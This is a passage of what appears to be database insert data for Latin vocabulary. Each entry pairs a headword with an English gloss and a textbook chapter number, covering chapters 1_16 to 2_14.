1), ('FVMVS', 307, 'fumus', 'smoke', '', '1_16', 1), ('FVNESTVS', 308, 'funestus', 'deadly', '', '1_16', 1), ('IGITVR', 309, 'igitur', 'therefore', '', '1_16', 1), ('INCENDIVM', 310, 'incendium', 'conflagration, eruption', '', '1_16', 1), ('LEGO/2', 311, 'lego', 'to read, choose', '', '1_16', 1), ('LITVS/2', 312, 'litus', 'shore', '', '1_16', 1), ('MATER', 313, 'mater', 'mother', '', '1_16', 1), ('MONS', 314, 'mons', 'mountain', '', '1_16', 1), ('NAVIS', 315, 'navis', 'ship', '', '1_16', 1), ('NVBES', 316, 'nubes', 'cloud', '', '1_16', 1), ('NVMQVAM', 317, 'numquam', 'never', '', '1_16', 1), ('OPPRIMO', 318, 'opprimo', 'to overwhelm, suppress', '', '1_16', 1), ('PARS', 319, 'pars', 'part', '', '1_16', 1), ('STVDEO', 320, 'studeo', 'to study, be eager for, be interested in (w/ dat.)', '', '1_16', 1), ('DOMVS', 321, 'domus', 'home', '', '1_17', 2), ('ALO', 322, 'alo', 'to feed, nourish', '', '1_17', 1), ('AMITTO', 323, 'amitto', 'to lose', '', '1_17', 1), ('CORNV', 324, 'cornu', 'horn', '', '1_17', 1), ('CORRIPIO', 325, 'corripio', 'to seize, occupy, engulf', '', '1_17', 1), ('CVRRO', 326, 'curro', 'to run', '', '1_17', 1), ('DEVASTO', 327, 'devasto', 'to lay waste', '', '1_17', 1), ('EXSTINGVO', 328, 'exstinguo', 'to extinguish', '', '1_17', 1), ('FACILE', 329, 'facile', 'easliy', '', '1_17', 1), ('IACIO', 330, 'iacio', 'to throw', '', '1_17', 1), ('IMPERATOR', 331, 'imperator', 'general, emperor', '', '1_17', 1), ('IMPETVS', 332, 'impetus', 'impetus, force, attack', '', '1_17', 1), ('INITIVM', 333, 'initium', 'beginning', '', '1_17', 1), ('IVSSVS', 334, 'iussus', 'order', '', '1_17', 1), ('LOCVS', 335, 'locus', 'place (sing.); passages of a book (m. pl.); geographical places(n. pl.)', '', '1_17', 1), ('MANVS/1', 336, 'manus', 'hand', '', '1_17', 1), ('MVRVS', 337, 'murus', 'wall', '', '1_17', 1), ('SINE', 338, 'sine', 'without (w/ abl.)', '', '1_17', 1), ('TEMPTO', 339, 'tempto', 'to try', '', '1_17', 1), ('TVMVLTVS', 340, 'tumultus', 'confusion', '', '1_17', 1), ('VENTVS', 341, 'ventus', 'wind', '', '1_17', 1), ('DVCO', 342, 'duco', 'to lead, take', '', '1_18', 2), ('ITA', 343, 'ita', 'yes', '', '1_18', 2), ('COLO/2', 344, 'colo', 'to worship, cultivate', '', '1_18', 1), ('CVM/3', 345, 'cum', 'when, after', '', '1_18', 2), ('DEA', 346, 'dea', 'goddess', '', '1_18', 1), ('DIES', 347, 'dies', 'day', '', '1_18', 1), ('DORMIO', 348, 'dormio', 'to sleep', '', '1_18', 1), ('EXCITO/1', 349, 'excito', 'to awaken, rouse, stir up', '', '1_18', 1), ('EXCLAMO', 350, 'exclamo', 'to exclaim', '', '1_18', 1), ('FACIES', 351, 'facies', 'face', '', '1_18', 1), ('FATVM', 352, 'fatum', 'fate, destiny', '', '1_18', 1), ('MARITVS/1', 353, 'maritus', 'husband', '', '1_18', 1), ('MERIDIES', 354, 'meridies', 'midday', '', '1_18', 2), ('MVLTVM/2', 355, 'multum', 'much', '', '1_18', 1), ('OCCVLTO', 356, 'occulto', 'to hide', '', '1_18', 1), ('PATER', 357, 'pater', 'father', '', '1_18', 2), ('POST/2', 358, 'post', 'after (w/ acc.)', '', '1_18', 1), ('QVAERO', 359, 'quaero', 'to look for, search', '', '1_18', 1), ('RES', 360, 'res', 'thing, matter', '', '1_18', 1), ('SI/2', 361, 'si', 'if', '', '1_18', 1), ('SOMNVS', 362, 'somnus', 'sleep', '', '1_18', 1), ('TAM', 363, 'tam', 'so ', '', '1_18', 1), ('VXOR', 364, 'uxor', 'wife', '', '1_18', 2), ('BARBA', 365, 'barba', 'beard', '', '1_19', 1), ('CARO/1', 366, 'caro', 'meat, flesh', '', '1_19', 1), ('CELERITER', 367, 'celeriter', 'swiftly', '', '1_19', 1), ('COQVO', 368, 'coquo', 'to cook', '', '1_19', 1), ('CRESCO', 369, 'cresco', 'to grow', '', '1_19', 1), ('FEROX', 370, 'ferox', 'fierce, ferocious', '', '1_19', 1), ('FORIS/2', 371, 'foris', 'outside, in the open', '', '1_19', 1), ('HERBA', 372, 'herba', 'plant, vegetation', '', '1_19', 1), ('HIC/1', 373, 'hic', 'this', '', '1_19', 1), ('INTER', 374, 'inter', 'between, among (w/ acc.)', '', '1_19', 1), ('PELLIS', 375, 'pellis', 'skin, hide', '', '1_19', 1), ('POSTQVAM', 376, 'postquam', 'after', '', '1_19', 1), ('PROELIVM', 377, 'proelium', 'battle, combat', '', '1_19', 1), ('SANO', 378, 'sano', 'to heal', '', '1_19', 1), ('SEDEO', 379, 'sedeo', 'to sit', '', '1_19', 1), ('TERO', 380, 'tero', 'to wear out, rub', '', '1_19', 1), ('TERRIBILIS', 381, 'terribilis', 'terrifying', '', '1_19', 1), ('VESTIMENTVM', 382, 'vestimentum', 'garment, clothes (pl.)', '', '1_19', 1), ('VIVO', 383, 'vivo', 'to live', '', '1_19', 1), ('VVLNERO', 384, 'vulnero', 'to wound', '', '1_19', 1), ('VVLNVS', 385, 'vulnus', 'wound', '', '1_19', 1), ('ABVNDO', 386, 'abundo', 'to abound with (w/ abl.)', '', '1_20', 1), ('ADOLESCENS/2', 387, 'adulescens', 'young man, young lady', '', '1_20', 1), ('AEQVVS', 388, 'aequus', 'even', '', '1_20', 1), ('COR', 389, 'cor', 'heart', '', '1_20', 1), ('DELECTO', 390, 'delecto', 'to delight, please', '', '1_20', 1), ('DIVINVS/2', 391, 'divinus', 'divine', '', '1_20', 1), ('EGEO', 392, 'egeo', 'to lack something (abl.)', '', '1_20', 1), ('FVR', 393, 'fur', 'thief', '', '1_20', 1), ('FVRTVM', 394, 'furtum', 'theft', '', '1_20', 1), ('HVMANVS', 395, 'humanus', 'human', '', '1_20', 1), ('ILLE', 396, 'ille', 'that', '', '1_20', 1), ('INIQVITAS', 397, 'iniquitas', 'injustice', '', '1_20', 1), ('LEX', 398, 'lex', 'law', '', '1_20', 1), ('LVDO', 399, 'ludo', 'to play', '', '1_20', 1), ('NOCTV', 400, 'noctu', 'during the night', '', '1_20', 1), ('PAENE', 401, 'paene', 'almost', '', '1_20', 1), ('PAVPER', 402, 'pauper', 'poor', '', '1_20', 1), ('PLENVS', 403, 'plenus', 'full of (w/ gen. or abl.)', '', '1_20', 1), ('POMVM', 404, 'pomum', 'fruit', '', '1_20', 1), ('PVNIO', 405, 'punio', 'to punish', '', '1_20', 1), ('ACCIPIO', 406, 'accipio', 'to accept, receive', '', '1_21', 1), ('ACCVSO', 407, 'accuso', 'to accuse someone (acc.) of something (gen.)', '', '1_21', 1), ('ALIENVS/2', 408, 'alienus', 'foreign to, inconsistent with (w/ a/ab and abl.)', '', '1_21', 1), ('AXIS', 409, 'axis', 'axle, axis', '', '1_21', 1), ('CIRCVM/2', 410, 'circum', 'around (w/ acc.)', '', '1_21', 1), ('CONSTANTIA', 411, 'constantia', 'constancy', '', '1_21', 1), ('DESCENDO', 412, 'descendo', 'to descend', '', '1_21', 1), ('DIVITIAE', 413, 'divitia', 'wealth, riches (pl.)', '', '1_21', 1), ('ERIPIO', 414, 'eripio', 'to snatch away', '', '1_21', 1), ('ERRO/2', 415, 'erro', 'to wander, make a mistake', '', '1_21', 1), ('EXTERNVS', 416, 'externus', 'outward, external', '', '1_21', 1), ('FORTVNA', 417, 'fortuna', 'fortune, the goddess Fortune', '', '1_21', 1), ('FVTVRVS', 418, 'futurus', 'about to be (from sum)', '', '1_21', 1), ('HONOR', 419, 'honor', 'honor, public office or distinction', '', '1_21', 1), ('MVTO/2', 420, 'muto', 'to change', '', '1_21', 1), ('POSSIDEO', 421, 'possideo', 'to possess', '', '1_21', 1), ('PROCERTO', 422, 'pro', 'for certain, for sure', '', '1_21', 1), ('RECIPIO', 423, 'recipio', 'to take back', '', '1_21', 2), ('REPREHENDO', 424, 'reprehendo', 'to blame, rebuke', '', '1_21', 1), ('ROTA', 425, 'rota', 'wheel', '', '1_21', 1), ('TOLLO', 426, 'tollo', 'to lift up, raise; to destroy', '', '1_21', 1), ('VERSO', 427, 'verso', 'to turn', '', '1_21', 1), ('VLLVS', 428, 'ullus', 'any', '', '1_21', 1), ('CONSILIVM', 429, 'consilium', 'plan, advice', '', '2_1', 2), ('MERIDIES', 430, 'meridies', 'midday', '', '2_1', 2), ('PROPE/2', 431, 'prope', 'near', '', '2_1', 2), ('ASPICIO', 432, 'aspicio', 'to look at, catch a glimpse of', '', '2_1', 1), ('ETET', 433, 'et', 'both…and…', '', '2_1', 1), ('GENS', 434, 'gens', 'tribe, population', '', '2_1', 1), ('GIGNO', 435, 'gigno', 'to give birth, produce', '', '2_1', 1), ('HODIE', 436, 'hodie', 'today', '', '2_1', 1), ('INCOLA', 437, 'incola', 'inhabitant', '', '2_1', 1), ('INSVLA', 438, 'insula', 'island', '', '2_1', 2), ('INVENIO', 439, 'invenio', 'to come upon, find', '', '2_1', 1), ('MOS', 440, 'mos', 'custom, habit; morals (pl.)', '', '2_1', 1), ('MVNDVS/1', 441, 'mundus', 'world', '', '2_1', 1), ('NE/4', 442, 'ne', 'that not, not to, lest ', '', '2_1', 3), ('OCCVPO/2', 443, 'occupo', 'to occupy', '', '2_1', 1), ('ORTVS', 444, 'ortus', 'origin, beginning, raising', '', '2_1', 1), ('PISCIS', 445, 'piscis', 'a fish', '', '2_1', 1), ('PROCVL', 446, 'procul', 'far, far away', '', '2_1', 1), ('PROMITTO', 447, 'promitto', 'to promise', '', '2_1', 1), ('SEPTENTRIONALIS', 448, 'septentrionalis', 'northern', '', '2_1', 1), ('SITVS/2', 449, 'situs', 'located, situated', '', '2_1', 1), ('SOL', 450, 'sol', 'sun', '', '2_1', 1), ('VTINAM', 451, 'utinam', 'if only', '', '2_1', 2), ('GERO', 452, 'gero', 'to carry; to behave (w/ se)', '', '2_2', 2), ('ODIVM', 453, 'odium', 'hatred', '', '2_2', 2), ('VALEO', 454, 'valeo', 'to be able (w/ inf.); to be in good health', '', '2_2', 3), ('ALTVS', 455, 'altus', 'tall, deep', '', '2_2', 1), ('ANNVS', 456, 'annus', 'year', '', '2_2', 1), ('ARGENTVM', 457, 'argentum', 'silver', '', '2_2', 1), ('AVRVM', 458, 'aurum', 'gold', '', '2_2', 1), ('BREVIS', 459, 'brevis', 'short', '', '2_2', 1), ('CLARVS', 460, 'clarus', 'clear, distinguished', '', '2_2', 1), ('CVSTOS', 461, 'custos', 'guard', '', '2_2', 1), ('EQVES', 462, 'eques', 'horseman', '', '2_2', 1), ('FINIS', 463, 'finis', 'end', '', '2_2', 1), ('GRAVIS', 464, 'gravis', 'serious, heavy', '', '2_2', 1), ('INTERDVM', 465, 'interdum', 'sometimes', '', '2_2', 1), ('LIS', 466, 'lis', 'dispute, quarrel', '', '2_2', 1), ('MANE/2', 467, 'mane', 'in the morning', '', '2_2', 1), ('ODIOHABEO', 468, 'odio', 'to hate somebody', '', '2_2', 1), ('SINO', 469, 'sino', 'to allow somebody (acc.) to do something (inf.)', '', '2_2', 1), ('VEL/1', 470, 'vel', 'or', '', '2_2', 1), ('VESTIS', 471, 'vestis', 'clothes, attire', '', '2_2', 1), ('VOX', 472, 'vox', 'voice', '', '2_2', 1), ('VT/4', 473, 'ut', 'that, to, in order to, so that', '', '2_2', 4), ('VVLTVS', 474, 'vultus', 'face', '', '2_2', 1), ('VXOR', 475, 'uxor', 'wife', '', '2_3', 2), ('AT/2', 476, 'at', 'but', '', '2_3', 1), ('CONIVX', 477, 'coniunx', 'spouse', '', '2_3', 1), ('DISCIPVLA', 478, 'discipula', 'student', '', '2_3', 1), ('DISCO', 479, 'disco', 'to learn', '', '2_3', 1), ('DOMINVS', 480, 'dominus', 'master, lord', '', '2_3', 1), ('FAMA', 481, 'fama', 'fame, name, reputation', '', '2_3', 1), ('FRATER', 482, 'frater', 'brother', '', '2_3', 1), ('IMPROBVS', 483, 'improbus', 'wicked, bad', '', '2_3', 1), ('IVNGO', 484, 'iungo', 'to join', '', '2_3', 1), ('MAGISTER', 485, 'magister', 'teacher', '', '2_3', 1), ('MATRIMONIVM', 486, 'matrimonium', 'marriage', '', '2_3', 1), ('NE/4', 487, 'ne', 'that not, not to, lest ', '', '2_3', 3), ('NVSQVAM', 488, 'nusquam', 'nowhere', '', '2_3', 1), ('PARIO/2', 489, 'pario', 'to give birth to', '', '2_3', 1), ('PERDO', 490, 'perdo', 'to lose, waste', '', '2_3', 1), ('SALVS', 491, 'salus', 'health, welfare', '', '2_3', 1), ('SALVTEMDICERE', 492, 'salutem', 'to greet (customary opening to letter) ', '', '2_3', 1), ('SCRIBO', 493, 'scribo', 'to write', '', '2_3', 1), ('VT/4', 494, 'ut', 'that, to, in order to, so that', '', '2_3', 4), ('VXOREMDEDVCERE', 495, 'uxorem', 'to marry a woman, to take as a wife', '', '2_3', 1), ('NEC/2', 496, 'nec', 'nor; and not', '', '2_4', 2), ('RECIPIO', 497, 'recipio', 'to take back', '', '2_4', 2), ('AGMEN', 498, 'agmen', 'marching column', '', '2_4', 1), ('APERIO', 499, 'aperio', 'to open', '', '2_4', 1), ('COEPIO', 500, 'coepi', 'to begin (w/ inf.)', '', '2_4', 1), ('DEFENDO', 501, 'defendo', 'to defend', '', '2_4', 1), ('EDO/1', 502, 'edo', 'to produce, give forth', '', '2_4', 1), ('EXTRA/2', 503, 'extra', 'outside of (w/ acc.)', '', '2_4', 1), ('FVRO', 504, 'furo', 'to rage, be insane', '', '2_4', 1), ('INGENS', 505, 'ingens', 'huge', '', '2_4', 1), ('INVADO/2', 506, 'invado', 'to burst in', '', '2_4', 1), ('LIGNEVS', 507, 'ligneus', 'made of wood', '', '2_4', 1), ('NEQVENEC', 508, 'neque', 'neither..nor…', '', '2_4', 1), ('PARCO', 509, 'parco', 'to spare somebody/thing (w/ dat.)', '', '2_4', 1), ('PONS', 510, 'pons', 'bridge', '', '2_4', 1), ('PORTA', 511, 'porta', 'gate', '', '2_4', 1), ('PRIMO', 512, 'primo', 'at first', '', '2_4', 1), ('QVAM/1', 513, 'quam', 'than (w/ comp. words)', '', '2_4', 2), ('QVANTVS/1', 514, 'quantus', 'how great, how much (inter. or rel. adj.)', '', '2_4', 1), ('RESISTO', 515, 'resisto', 'to resist (w/ dat.)', '', '2_4', 1), ('SIMVL/1', 516, 'simul', 'at the same time', '', '2_4', 1), ('TVTVS', 517, 'tutus', 'safe', '', '2_4', 1), ('VACVVS', 518, 'vacuus', 'empty of (w/ abl.)', '', '2_4', 1), ('VALEO', 519, 'valeo', 'to be able (w/ inf.); to be in good health', '', '2_4', 3), ('VICTOR', 520, 'victor', 'victor', '', '2_4', 1), ('VTINAM', 521, 'utinam', 'if only', '', '2_4', 2), ('BIBO/2', 522, 'bibo', 'to drink', '', '2_5', 1), ('CARMEN/1', 523, 'carmen', 'song, poem', '', '2_5', 1), ('CIBVS', 524, 'cibus', 'food', '', '2_5', 1), ('DVLCIS', 525, 'dulcis', 'sweet', '', '2_5', 1), ('FLVMEN', 526, 'flumen', 'river', '', '2_5', 1), ('IMMEMOR', 527, 'immemor', 'forgetful of (w/ gen.)', '', '2_5', 1), ('IOCVS', 528, 'iocus', 'joke', '', '2_5', 1), ('IVVENTVS', 529, 'iuventus', 'youth', '', '2_5', 1), ('LEVIS/1', 530, 'levis', 'light', '', '2_5', 1), ('MENS', 531, 'mens', 'mind, spirit', '', '2_5', 1), ('NE/4', 532, 'ne', 'that not, not to, lest ', '', '2_5', 3), ('ORO', 533, 'oro', 'to ask, entreat', '', '2_5', 1), ('PLACEO', 534, 'placeo', 'to please, be agreeable to somebody', '', '2_5', 1), ('PROXIMVS/2', 535, 'proximus', 'nearest', '', '2_5', 1), ('TAMQVAM/2', 536, 'tam', 'so…as…', '', '2_5', 1), ('VEHEMENS', 537, 'vehemens', 'violent, vehement', '', '2_5', 1), ('VETVS', 538, 'vetus', 'old', '', '2_5', 1), ('VINVM', 539, 'vinum', 'wine', '', '2_5', 1), ('VIRTVS', 540, 'virtus', 'courage, virtue', '', '2_5', 1), ('VITIVM', 541, 'vitium', 'vice', '', '2_5', 1), ('VT/4', 542, 'ut', 'that, to, in order to, so that', '', '2_5', 4), ('PATER', 543, 'pater', 'father', '', '2_6', 2), ('DECIPIO', 544, 'decipio', 'to deceive', '', '2_6', 1), ('DILIGO/3', 545, 'diligo', 'to love, esteem highly', '', '2_6', 1), ('DVO', 546, 'duo', 'two', '', '2_6', 1), ('EXERCITVS/1', 547, 'exercitus', 'army', '', '2_6', 1), ('FIDELIS/2', 548, 'fidelis', 'faithful, loyal', '', '2_6', 1), ('HERES', 549, 'heres', 'heir', '', '2_6', 1), ('IMPERIVM', 550, 'imperium', 'rule, empire, power', '', '2_6', 1), ('INOPIA', 551, 'inopia', 'helplessness, want', '', '2_6', 1), ('LAVDO', 552, 'laudo', 'to praise', '', '2_6', 1), ('NECESSEEST', 553, 'necesse', 'it is necessary for someone (dat.) to do something (inf.)', '', '2_6', 1), ('NEMO', 554, 'nemo', 'no one', '', '2_6', 1), ('PAVLO', 555, 'paulo', 'a little bit, to a small extent', '', '2_6', 1), ('QVAM/1', 556, 'quam', 'than (w/ comp. words)', '', '2_6', 2), ('QVANTVM/3', 557, 'quantum', 'to what extent, how much', '', '2_6', 1), ('RESTITVO', 558, 'restituo', 'to restore', '', '2_6', 1), ('SATIS/2', 559, 'satis', 'enough, sufficiently', '', '2_6', 1), ('SECVNDVS/1', 560, 'secundus', 'second', '', '2_6', 1), ('TERTIVS', 561, 'tertius', 'third', '', '2_6', 1), ('TRES', 562, 'tres', 'three', '', '2_6', 1), ('TRISTIS', 563, 'tristis', 'sad', '', '2_6', 1), ('VEHEMENTER', 564, 'vehementer', 'strongly, vehemently', '', '2_6', 1), ('NOLO', 565, 'nolo', 'not to want, to be unwilling', '', '2_7', 2), ('AETAS', 566, 'aetas', 'age', '', '2_7', 1), ('FIDES/2', 567, 'fides', 'faith', '', '2_7', 1), ('FVNDO/2', 568, 'fundo', 'to pour', '', '2_7', 1), ('GLORIA', 569, 'gloria', 'glory', '', '2_7', 1), ('LIBERTAS', 570, 'libertas', 'freedom', '', '2_7', 1), ('LVMEN', 571, 'lumen', 'light', '', '2_7', 1), ('MALO', 572, 'malo', 'to prefer', '', '2_7', 1), ('ORNATVS/1', 573, 'ornatus', 'adorned, ornate, elaborate', '', '2_7', 1), ('OTIVM', 574, 'otium', 'leisure, free time', '', '2_7', 1), ('POTENS', 575, 'potens', 'powerful', '', '2_7', 1), ('PVBLICVS/2', 576, 'publicus', 'common', '', '2_7', 1), ('QVALIS/1', 577, 'qualis', 'what sort of? (inter. adj.)', '', '2_7', 1), ('RESPVBLICA', 578, 'res', 'state', '', '2_7', 1), ('STVDIOSVS', 579, 'studiosus', 'fond of (w/ gen.)', '', '2_7', 1), ('TAMQVAM/1', 580, 'tamquam', 'as', '', '2_7', 1), ('TOT', 581, 'tot', 'so many', '', '2_7', 1), ('TRAHO', 582, 'traho', 'to drag, draw', '', '2_7', 1), ('VBI/1', 583, 'ubi', 'where? (inter. adv)', '', '2_7', 1), ('VIX', 584, 'vix', 'hardly', '', '2_7', 1), ('VNVS', 585, 'unus', 'one', '', '2_7', 1), ('VOLO/3', 586, 'volo', 'to want', '', '2_7', 1), ('VTILIS', 587, 'utilis', 'useful', '', '2_7', 1), ('ADHVC', 588, 'adhuc', 'still, up to this time', '', '2_8', 1), ('ANTIQVVS', 589, 'antiquus', 'ancient', '', '2_8', 1), ('ARS', 590, 'ars', 'science, art, skill', '', '2_8', 1), ('DOMINOR', 591, 'dominor', 'to dominate, rule', '', '2_8', 1), ('HORTOR', 592, 'hortor', 'to exhort, urge', '', '2_8', 1), ('LATINE', 593, 'Latine', 'in Latin', '', '2_8', 1), ('LATINVS/A', 594, 'Latinus', 'Latin, pertaining to Latin', '', '2_8', 1), ('LINGVA', 595, 'lingua', 'language; tongue', '', '2_8', 1), ('LOQVOR', 596, 'loquor', 'to speak', '', '2_8', 1), ('MAGIS/2', 597, 'magis', 'more', '', '2_8', 1), ('MAIOR', 598, 'maior', 'bigger; greater', '', '2_8', 1), ('MAXIMVS', 599, 'maximus', 'greatest', '', '2_8', 1), ('MELIOR', 600, 'melior', 'better', '', '2_8', 1), ('MINIMVS', 601, 'minimus', 'smallest', '', '2_8', 1), ('MINVS', 602, 'minus', 'less', '', '2_8', 2), ('OPTIMVS', 603, 'optimus', 'best', '', '2_8', 1), ('PARTIOR', 604, 'partior', 'to divide, distribute', '', '2_8', 1), ('PATIOR', 605, 'patior', 'to endure, tolerate, suffer', '', '2_8', 1), ('PEIOR', 606, 'peior', 'worse', '', '2_8', 1), ('PESSIMVS', 607, 'pessimus', 'worst', '', '2_8', 1), ('PLVRIMVS', 608, 'plurimus', 'most', '', '2_8', 1), ('PLVS', 609, 'plus', 'more', '', '2_8', 1), ('SEQVOR', 610, 'sequor', 'to follow', '', '2_8', 1), ('VEREOR', 611, 'vereor', 'to fear, respect', '', '2_8', 1), ('ADDO', 612, 'addo', 'to add', '', '2_9', 1), ('AVRIS', 613, 'auris', 'ear', '', '2_9', 1), ('CONOR', 614, 'conor', 'to try', '', '2_9', 1), ('DEMITTO', 615, 'demitto', 'to send down', '', '2_9', 1), ('DISSIMILIS', 616, 'dissimilis', 'dissimilar ', '', '2_9', 1), ('FACILIS', 617, 'facilis', 'easy', '', '2_9', 1), ('FERO', 618, 'fero', 'to carry, bear', '', '2_9', 1), ('FIO', 619, 'fio', 'to be made, become; (impersonally) to happen', '', '2_9', 1), ('FRIGVS', 620, 'frigus', 'cold', '', '2_9', 1), ('GENVS/1', 621, 'genus', 'kind', '', '2_9', 1), ('GLACIES', 622, 'glacies', 'ice', '', '2_9', 1), ('GRACILIS', 623, 'gracilis', 'slender', '', '2_9', 1), ('HVMILIS', 624, 'humilis', 'low, humble', '', '2_9', 1), ('ITER', 625, 'iter', 'road, trip ', '', '2_9', 1), ('LABOR/2', 626, 'labor', 'to slide, slip, glide down', '', '2_9', 1), ('MODEROR', 627, 'moderor', 'to manage, direct, guide', '', '2_9', 1), ('NIX', 628, 'nix', 'snow', '', '2_9', 1), ('ONVS', 629, 'onus', 'weight, burden', '', '2_9', 1), ('PERVENIO', 630, 'pervenio', 'to arrive', '', '2_9', 1), ('PROGREDIOR', 631, 'progredior', 'to go forward, proceed', '', '2_9', 1), ('QVOTIENS/2', 632, 'quotiens', 'as often as', '', '2_9', 1), ('SIMVLAC/2', 633, 'simulac', 'as soon as', '', '2_9', 1), ('SVVS', 634, 'suus', 'his, her, its, their', '', '2_10', 2), ('AEDES', 635, 'aedes', 'temple; pl. dwelling, house', '', '2_10', 1), ('EO/1', 636, 'eo', 'to go ', '', '2_10', 1), ('IVCVNDVS', 637, 'iucundus', 'pleasant, nice', '', '2_10', 1), ('LABOR/1', 638, 'labor', 'labor, toil', '', '2_10', 1), ('LAEDO', 639, 'laedo', 'to harm', '', '2_10', 1), ('LIBER/2', 640, 'liber', 'free', '', '2_10', 1), ('LVCRVM', 641, 'lucrum', 'profit, gain', '', '2_10', 1), ('MARITIMVS', 642, 'maritimus', 'maritime', '', '2_10', 1), ('MODVS', 643, 'modus', 'way, method, manner', '', '2_10', 1), ('PAVLISPER', 644, 'paulisper', 'for a little while', '', '2_10', 1), ('PECVNIA', 645, 'pecunia', 'money', '', '2_10', 1), ('PLACIDVS', 646, 'placidus', 'peaceful, calm', '', '2_10', 1), ('POTIVS', 647, 'potius', 'rather', '', '2_10', 1), ('PROSPER', 648, 'prosper', 'fortunate, prosperous', '', '2_10', 1), ('REDDO', 649, 'reddo', 'to give back', '', '2_10', 1), ('SARCINA', 650, 'sarcina', 'burden, baggage', '', '2_10', 1), ('SCELESTVS', 651, 'scelestus', 'wicked', '', '2_10', 1), ('SEMEL', 652, 'semel', 'once', '', '2_10', 1), ('SERENVS', 653, 'serenus', 'calm, clear', '', '2_10', 1), ('PARVM/2', 654, 'parum', 'too little', '', '2_11', 2), ('ALTER', 655, 'alter', 'the other (of two)', '', '2_11', 1), ('GEMMA', 656, 'gemma', 'gem, precious stone', '', '2_11', 1), ('LEGATVS', 657, 'legatus', 'ambassador', '', '2_11', 1), ('MAGNIHABEO', 658, 'magni', 'to esteem a lot', '', '2_11', 1), ('MINVS', 659, 'minus', 'less', '', '2_11', 2), ('NESCIO', 660, 'nescio', 'not to know', '', '2_11', 1), ('NEVTER', 661, 'neuter', 'neither, none (of two)', '', '2_11', 1), ('NVLLVS', 662, 'nullus', 'none', '', '2_11', 1), ('OPERAEPRETIVMEST', 663, 'operae', 'it is worthwhile', '', '2_11', 1), ('POPVLVS/1', 664, 'populus', 'a people, populace', '', '2_11', 1), ('QVOMODO/1', 665, 'quomodo', 'how', '', '2_11', 1), ('SALVTO', 666, 'saluto', 'to greet ', '', '2_11', 1), ('SERVVS/1', 667, 'servus', 'slave, servant', '', '2_11', 1), ('SOLVS', 668, 'solus', 'alone, only', '', '2_11', 1), ('SPECTO', 669, 'specto', 'to watch', '', '2_11', 1), ('TACEO', 670, 'taceo', 'to be silent, keep quiet', '', '2_11', 1), ('TOTVS', 671, 'totus', 'whole, entire', '', '2_11', 1), ('TVRPIS', 672, 'turpis', 'shameful, disgraceful', '', '2_11', 1), ('VTER/4', 673, 'uter', 'who, which (of two)?', '', '2_11', 1), ('VTOR', 674, 'utor', 'to use (w/ abl.)', '', '2_11', 1), ('CVM/3', 675, 'cum', 'when, after', '', '2_12', 2), ('INQVIO', 676, 'inquam', 'to say (used with direct speech)', '', '2_12', 3), ('TAMEN', 677, 'tamen', 'however', '', '2_12', 2), ('CARVS', 678, 'carus', 'dear', '', '2_12', 1), ('INSVLA', 679, 'insula', 'island', '', '2_12', 2), ('MORIOR', 680, 'morior', 'to die', '', '2_12', 1), ('NIMIS', 681, 'nimis', 'too much', '', '2_12', 1), ('NISI', 682, 'nisi', 'if not, unless', '', '2_12', 1), ('OFFICIVM', 683, 'officium', 'duty', '', '2_12', 1), ('ORBIS', 684, 'orbis', 'circle', '', '2_12', 1), ('ORBISTERRARVM', 685, 'orbis', 'the earth, the world', '', '2_12', 1), ('PROBO', 686, 'probo', 'to approve ', '', '2_12', 1), ('QVAMQVAM/2', 687, 'quamquam', 'although', '', '2_12', 1), ('QVAMVIS/1', 688, 'quamvis', 'although', '', '2_12', 1), ('QVIA', 689, 'quia', 'because', '', '2_12', 1), ('QVIDEM', 690, 'quidem', 'indeed', '', '2_12', 1), ('QVOD/1', 691, 'quod', 'because', '', '2_12', 1), ('SENTENTIA', 692, 'sententia', 'opinion, point of view', '', '2_12', 1), ('SORS', 693, 'sors', 'lot', '', '2_12', 1), ('SPERO', 694, 'spero', 'to hope', '', '2_12', 1), ('SPES', 695, 'spes', 'hope', '', '2_12', 1), ('ATQVE/1', 696, 'atque', 'as', '', '2_13', 2), ('ABSENS', 697, 'absens', 'away, absent', '', '2_13', 1), ('ABSVM/1', 698, 'absum', 'to be away', '', '2_13', 1), ('BENEVOLENTIA', 699, 'benevolentia', 'good will', '', '2_13', 1), ('DECLARO', 700, 'declaro', 'to demonstrate, show, make known, reveal', '', '2_13', 1), ('IDEM', 701, 'idem', 'the same', '', '2_13', 1), ('IPSE', 702, 'ipse', 'self', '', '2_13', 1), ('IRASCOR', 703, 'irascor', 'to be angry at (w/ dat.)', '', '2_13', 1), ('ISTE', 704, 'iste', 'that (of yours)', '', '2_13', 1), ('MIROR', 705, 'miror', 'to marvel, be surprised at', '', '2_13', 1), ('MVLTITVDO', 706, 'multitudo', 'crowd, throng', '', '2_13', 1), ('NEGO', 707, 'nego', 'to deny ', '', '2_13', 1), ('NVMERO/1', 708, 'numero', 'to number, count among', '', '2_13', 1), ('OFFENDO', 709, 'offendo', ']to happen upon, offend', '', '2_13', 1), ('REDEO/1', 710, 'redeo', 'to go back, return', '', '2_13', 1), ('REFERO', 711, 'refero', 'to carry back, report', '', '2_13', 1), ('SOCIVS/1', 712, 'socius', 'associate, partner, ally', '', '2_13', 1), ('TALIS', 713, 'talis', 'such a', '', '2_13', 1), ('TVRRIS', 714, 'turris', 'tower', '', '2_13', 1), ('VENIA', 715, 'venia', 'pardon, indulgence, forgiveness', '', '2_13', 1), ('VERSOR', 716, 'versor', 'to be situated in, be occupied in ', '', '2_13', 1), ('VIRGA', 717, 'virga', 'twig, stick', '', '2_13', 1), ('VOLVNTAS', 718, 'voluntas', 'will', '', '2_13', 1), ('AFFIRMO', 719, 'affirmo', 'to assert, maintain', '', '2_14', 1), ('CIRCVMEO/1', 720, 'circumeo', 'to go around', '', '2_14', 1), ('CONTINEO', 721, 'contineo', 'to hold, keep together, contain', '', '2_14', 1), ('COTIDIANVS', 722, 'cottidianus', 'of every day, daily', '', '2_14', 1), ('ELEMENTVM', 723, 'elementum', 'element', '', '2_14', 1), ('ERGO/2', 724, 'ergo', 'therefore', '', '2_14', 1), ('GRAVITAS', 725, 'gravitas', 'weight, gravity', '', '2_14', 1), ('IMMENSVS', 726, 'immensus', 'immeasurable, immense, endless', '', '2_14', 1), ('INFINITVS', 727, 'infinitus', 'boundless, unlimited', '', '2_14', 1), ('MAXIME', 728, 'maxime', 'most', '', '2_14', 1), ('MEDIVS', 729, 'medius', 'middle', '', '2_14', 1), ('MOTVS', 730, 'motus', 'motion, movement', '', '2_14', 1), ('MVLTO/2', 731, 'multo', 'by much', '', '2_14', 1), ('NATVRA', 732, 'natura', 'nature', '', '2_14', 1), ('NECESSARIO', 733, 'necessario', 'necessarily', '', '2_14', 1), 